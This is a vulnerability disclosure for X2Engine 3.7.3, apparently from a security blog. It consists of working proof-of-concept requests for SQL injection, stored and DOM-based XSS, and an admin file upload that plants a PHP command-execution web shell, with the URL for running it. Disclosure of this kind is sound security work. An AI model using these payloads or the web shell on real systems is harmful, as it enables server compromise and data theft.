# ============================================================== # Title ...| Multiple vulnerabilities in X2Engine # Version .| X2Engine 3.7.3 # Date ....| .02.2014 # Found ...| HauntIT Blog # Home ....| # ============================================================== [+] For admin logged in # ============================================================== # 1. SQL Injection ---<request>--- GET /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/profile/getEvents?lastEventId='mynameissqli&lastTimestamp=0&profileId=1&myProfileId=1 HTTP/1.1 Host: 10.149.14.62 (...) Connection: close ---<request>--- Parameter "lastTimestamp" is also vulnerable. # ============================================================== # 2. XSS ---<request>--- POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/contacts/create HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 917 Contacts%5BfirstName%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&Contacts%5Btitle%5D=tester&Contacts%5Bphone%5D=&Contacts%5Bphone2%5D=&Contacts%5BdoNotCall%5D=0&Contacts%5BlastName%5D=tester&Contacts%5Bcompany_id%5D=&Contacts%5Bcompany%5D=&Contacts%5Bwebsite%5D=&Contacts%5Bemail%5D=&Contacts%5BdoNotEmail%5D=0&Contacts%5Bleadtype%5D=&Contacts%5BleadSource%5D=&Contacts%5Bleadstatus%5D=&Contacts%5BleadDate%5D=&Contacts%5Binterest%5D=&Contacts%5Bdealvalue%5D=%240.00&Contacts%5Bclosedate%5D=&Contacts%5Bdealstatus%5D=&Contacts%5Baddress%5D=&Contacts%5Baddress2%5D=&Contacts%5Bcity%5D=&Contacts%5Bstate%5D=&Contacts%5Bzipcode%5D=&Contacts%5Bcountry%5D=&Contacts%5BbackgroundInfo%5D=&Contacts%5Bskype%5D=&Contacts%5Blinkedin%5D=&Contacts%5Btwitter%5D=&Contacts%5Bfacebook%5D=&Contacts%5Bgoogleplus%5D=&Contacts%5BotherUrl%5D=&Contacts%5BassignedTo%5D=admin&Contacts%5Bpriority%5D=&Contacts%5Bvisibility%5D=1&yt0=Create ---<request>--- Also vulnerable: Contacts%5Bwebsite%5D, Contacts%5Bcompany%5D, Contacts%5Binterest%5D... # ============================================================== # 3. Arbitrary File Upload ---<request>--- POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum=1&langCode=en HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 241 -----------------------------20967107015427 Content-Disposition: form-data; name="upload"; filename="mishell.php" Content-Type: application/octet-stream <?php system($_REQUEST['cmd']); ?> -----------------------------20967107015427-- ---<request>--- To access shell, go to: http://10.149.14.62/(...)/X2Engine-3.7.3/x2engine/uploads/media/admin/mishell.php?cmd=id # ============================================================== # 4. DOM-based XSS ---<request>--- POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum='');</script><script>alert(1)</script>&langCode=en HTTP/1.1 Host: 10.149.14.62 (...) <!-- yes, I know. This is the same request as [3] ;) Content-Length: 241 -----------------------------20967107015427 Content-Disposition: form-data; name="upload"; filename="mishell.php" Content-Type: application/octet-stream <?php system($_REQUEST['cmd']); ?> -----------------------------20967107015427-- ---<request>--- # ============================================================== # 5. XSS ---<request>--- POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/docs/create HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 260 Docs%5Bname%5D='%3e"%3e%3cbody%2fonload%3dalert(991212129)%3e&Docs%5Bvisibility%5D=1&yt0=Create&Docs%5Btext%5D=%3Chtml%3E%0D%0A%3Chead%3E%0D%0A%09%3Ctitle%3E%3C%2Ftitle%3E%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody%3Eaaaaaaaaaaaaaaaa%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E%0D%0A ---<request>--- # ============================================================== # More @ http://HauntIT.blogspot.com # Thanks! ;) # o/